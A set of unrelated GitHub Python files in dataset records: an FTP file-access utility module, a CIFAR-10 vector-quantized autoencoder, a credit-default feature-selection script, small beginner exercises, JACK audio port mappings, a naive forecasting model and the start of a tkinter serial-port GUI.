sheme_lookup\n#\n######################################################\nscheme_lookup['ftp'] = FtpDirectory\n\n\nclass FtpFile(StringIO): \n def __init__(self, ftp, file, mode='r'):\n self.ftp = ftp \n self.file = file\n if 'r' in mode or 'a' in mode:\n buf = self._ftpread()\n if 'w' in mode:\n buf = ''\n StringIO.__init__(self, buf) \n if 'a' in mode:\n self.seek(0,2) \n self.mode = mode\n\n def __repr__(self):\n return \"\"%(self.file, self.ftp.host, self.mode, id(self))\n\n if _P3:\n def _ftpread(self):\n ftp = self.ftp\n strout = BytesIO()\n ftp.retrbinary(\"RETR %s\"%(self.file), strout.write)\n strout.seek(0)\n return strout.read().decode()\n else:\n def _ftpread(self):\n ftp = self.ftp\n strout = StringIO()\n ftp.retrbinary(\"RETR %s\"%(self.file), strout.write)\n strout.seek(0)\n return strout.read()\n\n if _P3:\n def _ftpwrite(self, strin):\n f = BytesIO(strin.encode())\n ftp = self.ftp \n ftp.storbinary('STOR %s'%(self.file), f) \n\n else:\n def _ftpwrite(self, strin):\n f = StringIO(strin)\n ftp = self.ftp\n ftp.storbinary('STOR %s'%(self.file), f) \n\n def close(self):\n mode = self.mode\n if not 'r' in mode:\n self.seek(0) \n self._ftpwrite(self.read()) \n StringIO.close(self)\n\n @property\n def name(self):\n return self.file\n @property\n def path(self):\n return fpath(file, ftp=self.ftp)\n\n def __del__(self):\n if not self.closed: \n self.close()\n\n def __exit__(self, *args):\n self.close()\n\n def __enter__(self):\n return self \n\n\n\nif _P3:\n class FtpBytesFile(BytesIO): \n def __init__(self, ftp, file, mode='rb'):\n self.ftp = ftp \n self.file = file\n if not 'b' in mode:\n raise RunTimeError(\"should be opened 
as binary\")\n\n if 'r' in mode or 'a' in mode:\n buf = self._ftpread()\n elif 'w' in mode:\n buf = b''\n else:\n buf = self._ftpread()\n BytesIO.__init__(self, buf) \n if 'a' in mode:\n self.seek(0,2) \n self.mode = mode\n\n def __repr__(self):\n return \"\"%(self.file, self.ftp.host, self.mode, id(self))\n\n \n def _ftpread(self):\n ftp = self.ftp\n strout = BytesIO()\n ftp.retrbinary(\"RETR %s\"%(self.file), strout.write)\n strout.seek(0)\n return strout.read()\n \n def _ftpwrite(self, bytesin):\n f = BytesIO(bytesin)\n ftp = self.ftp \n ftp.storbinary('STOR %s'%(self.file), f) \n\n def close(self):\n mode = self.mode\n if not 'r' in mode:\n self.seek(0) \n self._ftpwrite(self.read()) \n BytesIO.close(self)\n\n @property\n def name(self):\n return self.file\n @property\n def path(self):\n return fpath(file, ftp=self.ftp)\n\n def __del__(self):\n if not self.closed: \n self.close()\n\n def __exit__(self, *args):\n self.close()\n\n def __enter__(self):\n return self \n\n\n#####################################################################\n#\n# FTP high level functions \n#\n#####################################################################\n\ndef ftp_path2path(ftp,path):\n \"\"\" take a ftp connection and a path return the true path \n if path is an url or path. \n If the url hostanme or login is different than \n \"\"\"\n url = urlsplit(path)\n if not url.hostname:\n return path\n if url.hostname!=ftp.host:\n raise ValueError(\"connection mismatch : '%s', '%s'\"%(url.hostname, ftp.host))\n\n if url.username and url.username!=getattr(ftp,\"username\", url.username):\n raise ValueError(\"connection username mismatch : '%s', '%s'\"%(url.username, ftp.username))\n return url.path[1:] # remove the root '/'\n\n\n\n\ndef remove_roots(lst, root):\n root = os.path.normpath(root)+\"/\"\n n = len(root)\n return [l[n:] if l[:n]==root else l for l in (os.path.normpath(l) for l in lst)]\n\n\n\ndef _ftp_exists(ftp, path):\n r, d = os.path.split(path)\n return os.path.join(r,d) in ftp.nlst(r)\n\ndef _ftp_dir(ftp, pathes, pref, output):\n \n if not len(pathes):\n try:\n lst = [pref] if pref and (len(ftp.nlst(pref)) or _ftp_exists(ftp, pref)) else []\n ## if belowe line uncomment it will end up with a one depth more \n #lst = ftp.nlst(pref) if pref else ftp.nlst() \n except error_temp as e:\n code = str(e).split(\" \")[0]\n if code!='450':\n raise e\n else: \n #output.append(pref)\n \n output.extend(lst)\n return 0\n\n glb = pathes[0]\n pathes.pop(0)\n\n if not glob.has_magic(glb):\n \n return _ftp_dir(ftp, pathes, os.path.join(pref,glb), output) \n\n try:\n lst = ftp.nlst(pref) if pref else ftp.nlst()\n except error_temp as e:\n code = str(e).split(\" \")[0]\n if code!='450':\n raise e\n \n return len(pathes)\n else:\n if len(lst)==1 and lst[0]==pref: # this is a file not a directory\n \n return len(pathes) \n for item in lst: \n _, f = os.path.split(item)\n if glob.fnmatch.fnmatch(f, glb):\n _ftp_dir(ftp, list(pathes), item, output)\n return len(pathes)\n\ndef ftp_ls(ftp, glb):\n output = []\n pathes = glb.split(\"/\")\n pref = \"\"\n if pathes and glb[0]==\"/\":\n pathes[0] = \"/\"+pathes[0]\n _ftp_dir(ftp, pathes, pref, output)\n return output\n\n\ndef ftp_isfile(ftp, path):\n try:\n lst = ftp.nlst(path)\n except error_perm:\n return False\n return len(lst)==1 and lst[0]==path\n\ndef ftp_exists(ftp, path):\n _, d = os.path.split(path) \n return d in [os.path.split(s)[1] for s in ftp.nlst(os.path.join(path, \"..\"))]\n\n\ndef _ftp_makedirs(ftp, pathes, pref, noerr):\n if not len(pathes):\n return 
0\n d = pathes[0]\n pathes.pop(0)\n d = os.path.join(pref,d)\n try:\n ftp.mkd(d)\n except error_perm as e: \n #if not len(pathes):\n if noerr: \n if ftp_isfile(ftp, d):\n raise error_perm(\"550 %s: File exists.\"%d)\n else:\n raise error_perm(e) \n return _ftp_makedirs(ftp, pathes, d, noerr) \n\ndef ftp_makedirs(ftp, dirs, noerr=False):\n pathes = dirs.split(\"/\")\n if pathes and dirs[0]==\"/\":\n pathes[0] = \"/\"+pathes[0]\n _ftp_makedirs(ftp, pathes, \"\", noerr)\n\ndef ftp_dirlist(ftp, directory, verbose=VERBOSE):\n \"\"\"\n Return a list of file of the directory in ftp connection\n the returned list does not contain the directory path\n \"\"\"\n listfile = []\n log.notice(\"Changing distant directory to %s\"%(directory))\n\n rtr = ftp.cwd(directory)\n log.notice(\"%s\"%(rtr))\n log.notice(\"Get file list \")\n\n rtr = ftp.retrlines('NLST', listfile.append)\n log.notice(\"%s\"%(rtr), verbose)\n\n return listfile\n\n\n\ndef ftp_rmtree(ftp, path):\n \"\"\"Recursively delete a directory tree on a remote server.\"\"\"\n wd = ftp.pwd()\n\n try:\n names = ftp.nlst(path)\n except all_errors as e:\n # some FTP servers complain when you try and list non-existent paths\n return\n\n for name in names:\n if os.path.split(name)[1] in ('.', '..'): continue\n\n\n try:\n ftp.cwd(name) # if we can cwd to it, it's a folder\n ftp.cwd(wd) # don't try a nuke a folder we're in\n ftp_rmtree(ftp, name)\n except all_errors:\n ftp.delete(name)\n\n try:\n ftp.rmd(path)\n except all_errors as e: \n return\n\ndef local_rmtree(path):\n import shutil\n shutil.rmtree(path)\n\n\ndef _ftp_glob_dirlist_rec(ftp, path_list, pref=\"\", verbose=VERBOSE):\n # walk through the path_list to get a list of files\n # ftp NLST to not allows to list a path of directory with the * like /tmp/*/*.txt\n # so we need to split the path and goes directory by directory if needed\n\n if not len(path_list):\n return []\n\n directory_glob = path_list.pop(0)\n if not glob.has_magic( directory_glob ):\n if not len(path_list):\n # end of the recursive call, just return the list\n file_list = []\n ftp.retrlines(\"NLST %s\"%pref+directory_glob , file_list.append)\n return file_list\n else:\n # if no magic found just stick to the prefix and send the rest of\n # path_list as a copy: list(path_list)\n return _ftp_glob_dirlist_rec(ftp, list(path_list), pref=pref+directory_glob+\"/\", verbose=verbose)\n\n directory_found = []\n\n # the following line works only with * not with more complex glob [0-9] etc ...\n #rtr = ftp.retrlines(\"NLST %s\"%pref+directory_glob , directory_found.append)\n # So we need to list all the directory and then match the files\n ftp.retrlines(\"NLST %s\"%pref, directory_found.append)\n #pref_len = len(pref)\n #directory_found = [l for l in directory_found if glob.fnmatch.fnmatch(l[pref_len:], directory_glob)]\n directory_found = [l for l in directory_found if glob.fnmatch.fnmatch(os.path.split(l)[1], directory_glob)]\n\n if not len(path_list):\n return directory_found\n\n output = []\n\n for d in directory_found:\n # list(path_list) to make a copy\n fls = _ftp_glob_dirlist_rec(ftp, list(path_list), pref=d+\"/\", verbose=verbose)\n # extend the output with the new found\n output.extend(fls)\n return output\n\n\n\n\n###############################################\n# old stuf \n\ndef ftp_put(ftp, local, remote): \n with open(local, 'rb') as f: \n ftp.storbinary('STOR %s'%remote, f) # send the file\n return remote\n\ndef ftp_get(ftp, remote, local):\n with open(local, \"wb\") as f:\n ftp.retrbinary(\"RETR %s\"%(remote),f.write)\n 
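# retrbinary has streamed the remote file to disk; hand back the local path\n 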
return local \n\ndef ftp_mget(ftp, remotes, localdir):\n if isinstance(remotes, basestring):\n files = ftp_ls(ftp, remotes)\n else:\n files = list(remotes)\n\n lst = [] \n for remote in files:\n _, name = os.path.split(remote)\n lst.append(ftp_get(ftp, remote, os.path.join(localdir, name)))\n return lst \n\ndef ftp_mput(ftp, flocals, remotedir):\n if isinstance(flocals, basestring):\n files = glob.glob(flocals)\n else:\n files = list(flocals)\n\n lst = [] \n for local in files:\n _, name = os.path.split(local)\n lst.append(ftp_put(ftp, local, os.path.join(remotedir, name)))\n return lst \n\n\ndef ftp_lsdir(ftp, strglob, verbose=VERBOSE):\n \"\"\"\n ftp_lsdir(ftp, str)\n does the same thing as lsdir but for a ftp connection.\n \"\"\"\n return ftp_glob_dirlist_rec(ftp, strglob, verbose=verbose)\n\ndef ftp_glob_dirlist_rec( ftp, path, verbose=VERBOSE):\n path_list = path.split(\"/\")\n pref = \"\"\n if len(path_list) and path_list[0] == \"\":\n path_list.pop(0)\n pref= \"/\"\n log.notice( \"Looking for '%s:%s' in ftp connection ... \"%(ftp.host,path) )\n files= _ftp_glob_dirlist_rec(ftp, path_list, pref, verbose=verbose)\n log.notice( \"found %d\"%(len(files)) )\n return files\n\n\n\n\n\ndef ftp_transfer(ftp, strglob, localdir= \"\",distdir=\"\",\n verbose=VERBOSE, force=FORCE):\n \"\"\"\n ftp_transfer(ftp, strglob, localdir= \"\",distdir=\"\")\n Transfer file matching strglob from the ftp connection. The hierarchic path directory\n will be created from the localdir.\n distdir is the distant root ftp directory starting point, is equivalent\n to do a ftp.cwd( distdir) to change directory.\n\n \"\"\"\n if distdir and len(distdir):\n ftp.cwd(distdir)\n files = ftp_lsdir(ftp, strglob, verbose=verbose)\n if not len(files):\n return []\n return ftp_transfer_files( ftp, files, localdir=localdir,\n distdir=distdir,\n verbose=verbose, force=force)\n\n\n\ndef ftp_transfer_files(ftp, files, localdir= \"\", distdir=\"\", verbose=VERBOSE, force=FORCE):\n \"\"\"\n Transfer a list of files from the ftp connection. 
The hierarchic path directory\n will be created from the localdir.\n distdir is the distant root ftp directory starting point, is equivalent\n to do a ftp.cwd( distdir) to change directory.\n\n Return the list of local path to files\n \"\"\"\n if os.path.exists(localdir):\n if not os.path.isdir(localdir):\n raise Exception(\"The local path '%s' is not a directory\"%(localdir))\n else:\n os.makedirs(localdir) \n if distdir and distdir!=\"\":\n ftp.cwd(distdir)\n\n global _ftpfinished\n global _ftpwrfunc\n\n\n outlist = []\n for path in files:\n subdir, fl = os.path.split(path)\n if subdir[0:len(distdir)] == distdir:\n subdir = subdir[len(distdir):]\n create_dir(subdir, localdir, verbose=verbose)\n localpath = os.path.join(localdir, subdir, fl)\n\n if not force and os.path.exists(localpath):\n log.notice(\"file %s already exists use force=True to force download\"%(localpath))\n else:\n log.notice(\"FTP: Copying file %s:%s to %s \"%(ftp.host, fl, localdir+subdir))\n\n try:\n ftp.retrbinary(\"RETR %s\"%(path),open(localpath, \"wb\").write)\n except error_perm:\n log.warning(\"wrong permission for transfer %s\"%path) \n outlist.append( localpath )\n return outlist\n\n\ndef ftp_put_file(ftp, file, distdir=\"\"):\n if distdir:\n ftp.cwd(distdir)\n d, filename = os.path.split(file) \n file = open(file,'rb') # file to send\n \n ftp.storbinary('STOR %s'%filename, file) # send the file\n log.notice(\"file '%s' transferred in '%s/%s' \"%(filename,ftp.host, ftp.user()))\n file.close()\n\ndef create_dir(directory,inside=\"\", verbose=VERBOSE):\n \"\"\"\n recreate if necessary a directory structure from a path string \"a/b/c\" or a list [\"a\",\"b\",\"c\"]\n The second argument specifies where the structure should be installed\n so create_dir( \"data/set1\", \"/tmp\") is the same as create_dir( \"tmp/data/set1\")\n\n \"\"\"\n\n if not os.path.isdir(inside):\n raise Exception( \"'%s' is not a directory\"%inside)\n if isinstance( directory, basestring):\n # save time exit if exists\n if os.path.isdir(os.path.join( inside,directory)):\n return None\n directories = directory.split(\"/\")\n else:\n directories = directory\n if os.path.isdir(os.path.join(inside, *directories)):\n return None\n\n sub = inside\n while len(directories):\n sub += \"/\"+directories.pop(0)\n\n if os.path.exists(sub):\n if not os.path.isdir(sub):\n raise Exception(\"'%s' exists but is not a directory \"%(sub))\n else:\n log.notice(\"Creating directory %s\"%sub, verbose)\n os.mkdir(sub)\n return None\n","repo_name":"SylvainGuieu/path","sub_path":"__ftp__.py","file_name":"__ftp__.py","file_ext":"py","file_size_in_byte":24162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72630970153","text":"import torch\r\nfrom torch import nn\r\nfrom torchvision.datasets import CIFAR10\r\nfrom torch.utils.data.dataloader import DataLoader\r\nimport torchvision.transforms as transforms\r\nfrom torch.autograd import Function\r\nimport torchvision\r\nimport torch.nn.functional as F\r\nfrom tqdm import tqdm, trange\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nimport numpy as np\r\n\r\ndef load_cifar10():\r\n transform = transforms.Compose(\r\n [transforms.ToTensor(),\r\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\r\n dataset = torchvision.datasets.CIFAR10('.', download=True, transform=transform)\r\n return dataset\r\n\r\n\r\nclass Encoder(nn.Module):\r\n def __init__(self):\r\n super(Encoder, self).__init__()\r\n \r\n self.resnet18 = 
torchvision.models.resnet18(pretrained=True)\r\n \r\n # adjust last layer to cifar10\r\n self.resnet18.fc = nn.Linear(512, 10)\r\n\r\n def forward(self, x):\r\n return self.resnet18(x)\r\n\r\n\r\nclass Quantizer(nn.Module):\r\n def __init__(self):\r\n super(Quantizer, self).__init__()\r\n self.K = 1024 # Number of elements in dictionary\r\n self.D = 10 # Dimension of each element in dictionary\r\n \r\n self.embedding = nn.Embedding(self.K, self.D)\r\n self.embedding.weight.data.normal_()\r\n\r\n self.mse_loss = nn.MSELoss()\r\n\r\n def forward(self, encoder_embedding):\r\n \"\"\"\r\n Takes the input from the encoder network and finds the nearest tensor in the dictionary.\r\n This Tensor will later be passed to the decoder network.\r\n \"\"\"\r\n \r\n # calculate the distance between the encoder embedding and every element in the dictionary\r\n distance = torch.sum((encoder_embedding.unsqueeze(1) - self.embedding.weight)**2, dim=2)\r\n \r\n # find the index of the nearest element in the dictionary\r\n quantized_embedding_indices = torch.argmin(distance, dim=1)\r\n\r\n # find the nearest element in the dictionary\r\n quantized_embedding = self.embedding(quantized_embedding_indices)\r\n \r\n # compute quantization loss\r\n # this loss is not backpropagated to the encoder network\r\n quantization_loss = self.mse_loss(encoder_embedding.detach(), quantized_embedding)\r\n \r\n # preserve gradients\r\n quantized_embedding = encoder_embedding + (quantized_embedding - encoder_embedding).detach()\r\n \r\n loss = quantization_loss\r\n \r\n return quantized_embedding, loss\r\n\r\n\r\nclass Decoder(nn.Module):\r\n def __init__(self):\r\n super(Decoder, self).__init__()\r\n \r\n # 10 ==> 64 ==> 128 ==> 256 ==> 512 ==> 1024 ==> 3072\r\n self.fc1 = nn.Linear(10,64)\r\n self.fc2 = nn.Linear(64, 128)\r\n self.fc3 = nn.Linear(128, 256)\r\n self.fc4 = nn.Linear(256, 512)\r\n self.fc5 = nn.Linear(512, 32*32)\r\n self.fc6 = nn.Linear(1024, 32*32*3)\r\n \r\n self.dropout = nn.Dropout(0.2) \r\n \r\n def forward(self, quantized_embedding):\r\n \"\"\"\r\n Takes the quantized embedding from the quantizer network and reconstructs the image.\r\n \"\"\"\r\n\r\n x = F.relu(self.fc1(quantized_embedding))\r\n x = self.dropout(x)\r\n\r\n x = F.relu(self.fc2(x))\r\n x = self.dropout(x)\r\n \r\n x = F.relu(self.fc3(x))\r\n x = self.dropout(x)\r\n\r\n x = F.relu(self.fc4(x))\r\n x = self.dropout(x)\r\n\r\n x = F.relu(self.fc5(x))\r\n x = self.dropout(x)\r\n \r\n x = self.fc6(x)\r\n x = x.reshape(-1, 3, 32, 32)\r\n \r\n return x\r\n \r\n# Training Loop\r\n\r\nif __name__==\"__main__\":\r\n dataset = load_cifar10()\r\n dataloader = DataLoader(dataset, batch_size=64, shuffle=True, num_workers=4)\r\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\r\n EPOCHS = 50\r\n\r\n encoder = Encoder().to(device)\r\n quantizer = Quantizer().to(device)\r\n decoder = Decoder().to(device)\r\n\r\n mse_loss = nn.MSELoss()\r\n\r\n optimizer = torch.optim.SGD(list(encoder.parameters()) + list(quantizer.parameters()) + list(decoder.parameters()), lr=1e-1, weight_decay=1e-5)\r\n\r\n lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[45], gamma=0.1)\r\n\r\n tb_writer = SummaryWriter()\r\n \r\n for epoch in list(range(EPOCHS)):\r\n \r\n batch_iter = tqdm(enumerate(dataloader), 'Training', total=len(dataloader), leave=False)\r\n train_losses = []\r\n for batch_idx, batch in batch_iter:\r\n input, target_label = batch\r\n input = input.to(device)\r\n # target = target.to(device)\r\n \r\n 
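# Forward pass: ResNet-18 encoder -> vector quantizer (straight-through) -> MLP decoder\r\n 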
encoder_embedding = encoder(input)\r\n quantized_embedding, qaunt_loss = quantizer(encoder_embedding)\r\n pred = decoder(quantized_embedding)\r\n\r\n # reconstruction losses:\r\n recon_loss = mse_loss(input, pred)\r\n\r\n # total loss:\r\n loss = recon_loss + qaunt_loss\r\n \r\n optimizer.zero_grad() # zerograd the parameters\r\n loss.backward()\r\n optimizer.step()\r\n\r\n train_losses.append(loss.item())\r\n batch_iter.set_description(f'Training: [{epoch:d}/{EPOCHS:d}] (loss {loss.item():.4f})') # update progressbar\r\n\r\n \r\n if batch_idx % 10 == 0: \r\n tb_writer.add_images('input', (input[:5,...]+0.5).clip(0,1), epoch)\r\n tb_writer.add_images('decoder output', (pred[:5,...]+0.5).clip(0,1), epoch)\r\n tb_writer.flush()\r\n \r\n tb_writer.add_scalar('Loss/train', np.mean(train_losses), epoch)\r\n tb_writer.add_scalar('lr', optimizer.param_groups[0]['lr'], epoch)\r\n tb_writer.flush()\r\n lr_scheduler.step()\r\n\r\n \r\n \r\n \r\n ","repo_name":"AmitNativ1984/MenteeRobotics","sub_path":"auto_encoder_question.py","file_name":"auto_encoder_question.py","file_ext":"py","file_size_in_byte":5840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16746120870","text":"import boto3\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_selection import RFECV\nfrom sklearn.metrics import make_scorer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom Amex_Metric import amex_metric\n\ns3 = boto3.resource('s3')\nbucket_name = 'analytics-data-science-competitions'\nbucket = s3.Bucket(bucket_name)\n\n## Defining files names\nfile_key = 'AmericanExpress/Delinquency_Features_Filled.csv'\n\nbucket_object = bucket.Object(file_key)\nfile_object = bucket_object.get()\nfile_content_stream = file_object.get('Body')\n\n## Reading data-files\ndata = pd.read_csv(file_content_stream)\ndata = data.drop(columns = ['D_64_last'], axis = 1)\n\n## Putting variables in the right shape \ndata['D_68_last'] = data['D_68_last'].astype(str)\ndata['D_114_last'] = data['D_114_last'].astype(str)\ndata['D_116_last'] = data['D_116_last'].astype(str)\ndata['D_117_last'] = data['D_117_last'].astype(str)\ndata['D_120_last'] = data['D_120_last'].astype(str)\ndata['D_126_last'] = data['D_126_last'].astype(str)\n\n## Converting to dummies\ndummies = pd.get_dummies(data[['D_63_last', 'D_68_last', 'D_114_last', 'D_116_last', 'D_117_last', 'D_120_last', 'D_126_last']])\n\n## Appeding dummies \ndata = data.drop(columns = ['D_63_last', 'D_68_last', 'D_114_last', 'D_116_last', 'D_117_last', 'D_120_last', 'D_126_last'], axis = 1)\ndata = pd.concat([data, dummies], axis = 1)\n\n## Defining input and target variables\nX = data.drop(columns = ['customer_ID', 'target'], axis = 1)\nY = data['target']\n\n## Spliting the data into train, validation, and test\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.20, stratify = Y)\n\n## Defining the customized scoring function \namex_function = make_scorer(amex_metric, greater_is_better = True, needs_proba = True)\n\n## Defining list to store results\nfeatures_to_select = list()\n\nfor i in tqdm(range(0, 10)):\n \n ## Running RFE with Random forest\n RF_auto_feature = RFECV(estimator = RandomForestClassifier(n_estimators = 50, max_depth = 3), step = 50, scoring = amex_function, min_features_to_select = 10, cv = 3, n_jobs = -1).fit(X_train, Y_train)\n\n ## Appending results \n 
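# support_ is a boolean mask over X_train's columns marking the features RFECV kept\n 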
features_to_select.append(X_train.columns[RF_auto_feature.support_])\n \n## Putting results as data-frame\nfeatures_to_select = pd.DataFrame(features_to_select)\nfeatures_to_select.to_csv('Delinquency_Features_to_select_9.csv', index = False)","repo_name":"Analytics-Data-Science-and-Tech/Analytics_Data_Science","sub_path":"American_Express/Oscar/FS_standard_script.py","file_name":"FS_standard_script.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10855929909","text":"#create min and max variables\nbiggest = None\nsmallest = None\n#start while loop\nwhile True:\n n = input('> ')\n #exit loop if user enters 'done'\n if n == 'done':\n break\n #check if input is valid, outputs error and returns to top of loop if invalid\n try:\n n = float(n)\n except:\n print('Invalid input')\n continue\n #see if iteration is biggest and save if so\n if biggest is None:\n biggest = n\n elif biggest < n:\n biggest = n\n #see if iteration is smallest and save if so\n if smallest is None:\n smallest = n\n elif smallest > n:\n smallest = n\nprint('Maximum is',str(biggest))\nprint('Minimum is',str(smallest))\n","repo_name":"mikemorton72/py4e","sub_path":"1 Basics/5.2enteredwordcounter.py","file_name":"5.2enteredwordcounter.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"26229578500","text":"# Write a function that reads a text file and returns its contents.\n# Parameter: file name\n# Return value: the contents of the file\ndef load(filename):\n try:\n with open(filename, 'rt', encoding='utf-8') as file:\n content = file.read()\n return content\n except:\n return ''\n \ndef save(filename, content):\n with open(filename, 'wt', encoding='utf-8') as file:\n file.write(content)\n \n \ndef main():\n try: \n file_name = 'live.txt'\n content = load(file_name)\n print(content)\n \n # save('live2.txt', content) #<- this just copies the file\n \n \n # after editing the file\n text = input('Content to add : ')\n content += text + '\\n'\n save(file_name, content)\n # save(filename)\n except Exception as e:\n print(e)\nmain()","repo_name":"kimvjgd/python","sub_path":"chapter14_file_input_output/ex08.py","file_name":"ex08.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10542676808","text":"def getPortDesc (loops, fx_loops, n_effects, midi_loops):\n\treturn [('capture_1', ['system:capture_1']),\n\t\t\t ('capture_2', ['system:capture_1']),\n\t\t\t #('capture_2', ['system:capture_2']),\n\t\t\t ('playback_1', ['system:playback_1']),\n\t\t\t ('playback_2', ['system:playback_2']),\n\t\t\t #('hydrogen_out', ['Hydrogen', 'out_R']),\n\t\t\t ('aubio_in', ['aubio', 'in']),\n\t\t\t ('amsynth_out', ['amsynth', 'R out']),\n\t\t\t ('fluidsynth_out', ['fluidsynth-midi', 'right']),\n\t\t\t ('drum', ['fluidsynth-midi-01', 'right']),\n\t\t\t ('sl_in', ['Looper:in'])] + \\\n\t\t\t [('sl_out_' + str(i), ['Looper', 'out' + str(i)]) for i in range(loops)] + \\\n\t\t\t [('fx_in_' + str(i), ['effect_' + str(i) + ':in']) for i in range(n_effects)] + \\\n\t\t\t [('fx_out_' + str(i), ['effect_' + str(i) + ':out']) for i in range(n_effects)] + \\\n\t\t\t [('loop_fx_' + str(k) + '_in_' + str(i), ['effect_' + str(((k + 1) * n_effects) + i) + ':in']) for i in range(n_effects) for k in range(fx_loops)] + \\\n\t\t\t [('loop_fx_' + str(k) + '_out_' + str(i), ['effect_' + str(((k + 1) * n_effects) + i) + ':out']) for i in range(n_effects) for k in 
range(fx_loops)] + \\\n\t\t\t [('fluidsynth_loop_' + str(i), ['fluidsynth-midi-0' + str(i + 2) + ':right']) for i in range (midi_loops)]\n\ndef getPortDescMidi (fx_loops, midi_loops):\n\treturn \t[('korg_in', ['system', 'capture']),\n\t\t\t ('korg_out', ['system', 'playback']),\n\t\t\t ('sl', ['Looper', 'midi_control']),\n\t\t\t ('sl_capture', ['Looper', 'midi_capture']),\n\t\t\t #('hydrogen', ['hydrogen', 'midi', 'RX']),\n\t\t\t ('amsynth', ['amsynth', 'midi_in']),\n\t\t\t ('fluidsynth', ['fluidsynth-midi', 'midi']),\n\t\t\t ('drum', ['fluidsynth-midi-01', 'midi']),\n\t\t\t ('aubio', ['aubio', 'midi_out']),\n\t\t\t ('midimap_in_cc', ['MidiMap', 'in_cc']),\n\t\t\t ('midimap_out_cc', ['MidiMap', 'out_cc-0']),\n\t\t\t ('midimap_in_channel_fx', ['MidiMap', 'in_channel-0']),\n\t\t\t ('midimap_out_channel_fx', ['MidiMap', 'out_channel-0']),\n\t\t\t ('midimap_control_fx', ['MidiMap', 'control-0']),\n\t\t\t ('mod-host-fx', ['mod-host:midi_in'])] + \\\n\t\t\t [('fluidsynth_loop_' + str(i), ['fluidsynth-midi-0' + str(i + 2) + ':midi_00']) for i in range(midi_loops)] + \\\n\t\t\t [('midimap_in_channel_loop_' + str(i), ['MidiMap:in_channel-' + str(i+1)]) for i in range(fx_loops)] + \\\n\t\t\t [('midimap_out_channel_loop_' + str(i), ['MidiMap:out_channel-' + str(i+1)]) for i in range(fx_loops)] #+ \\\n\t\t\t #[('midimap_control_loop_' + str(i), ['MidiMap:control-' + str(i+1)]) for i in range(fx_loops)] #+ \\\n\t\t\t #[('mod-host-loop_' + str(i), ['mod-host-0' + str(i + 1) + ':midi_in']) for i in range(fx_loops)]\n","repo_name":"flappix/raspberry-looper","sub_path":"port_desc.py","file_name":"port_desc.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21995436","text":"\nimport warnings\n\n# Temporarily suppress FutureWarning (the imports must sit inside the\n# with-block, otherwise the filter has no effect on them)\nwith warnings.catch_warnings():\n    warnings.simplefilter(\"ignore\", category=FutureWarning)\n\n    import pandas as pd\n    from sklearn.linear_model import LinearRegression\n    import numpy as np\n\n# In module1.py\nimport sys\nimport os\n\n# Get the absolute path of folder2\ncurrent_dir = os.path.dirname(__file__)\nparent_dir = os.path.join(current_dir, os.pardir)\nfolder2_dir = os.path.join(parent_dir, 'ml_combat')\n\n# Add folder2 to sys.path\nsys.path.append(parent_dir)\n\nfrom ml_combat.MetaModel import MetaModel\nimport ml_combat as ml\n\n###### Start Here ######\nclass NaiveModel(MetaModel):\n    \n    def __init__(self):\n        super().__init__(\"Naive Model\")\n    \n    def preprocess(self, df):\n        \"\"\"\n        \"\"\"\n        temp_df = df.copy()\n\n        return temp_df\n\n    def train(self, df):\n        \"\"\"\n        \"\"\"\n        df = self.preprocess(df)\n\n        self.model = df.y.mean()\n\n\n    def predict(self, df):\n        df = self.preprocess(df)\n\n        df['y_pred'] = self.model\n\n        return df[['ds', 'y_pred']].copy()\n    \n\n\ndf = ml.data.get_training_flattened()\n\nfor location in ['A', 'B', 'C']:\n    temp_df = df[df['location'] == location]\n\n    lr = NaiveModel()\n    lr.test(temp_df)\n\nprint(\"Done testing the naive model!\")","repo_name":"jacob-a-worsoe/stabekk","sub_path":"models_here_hahah/naive.py","file_name":"naive.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31147342531","text":"# function that returns the minimum of 3 numbers\r\n\r\ndef min(num1,num2,num3):\r\n    if num1 <= num2 and num1 <= num3:#check num1 (<= so ties are handled)\r\n        return num1\r\n    if num2 <= num1 and num2 <= num3:#check num2\r\n        return num2\r\n    if num3 <= num1 and num3 <=
 num2:#check num3\r\n        return num3\r\n    return 0 # unreachable once <= is used above, kept as a fallback\r\n\r\n\r\ndef main():\r\n    print(\"Start\")\r\n    n1 = 5\r\n    n2 = 9\r\n    n3 = 10\r\n    minNum = min(n1,n2,n3)\r\n    print(\"The min is\", minNum)\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"Reikenzan/Some-Python","sub_path":"SomeWork/minNum.py","file_name":"minNum.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35109634337","text":"import tkinter as tk\nfrom PIL import ImageTk, Image\nimport serial.tools.list_ports\nimport serial\n\ndef light_up_button(button):\n    button.config(bg='green')\n\ndef turn_off_button(button):\n    button.config(bg='black')\n\ndef make_circle(image_path, size):\n    image = Image.open(image_path)\n    image = image.resize((size, size), Image.LANCZOS)  # Image.ANTIALIAS was removed in Pillow 10\n    return ImageTk.PhotoImage(image)\n\ndef get_serial_ports():\n    ports = serial.tools.list_ports.comports()\n    port_names = [port.device for port in ports]\n    return port_names\n\nwindow = 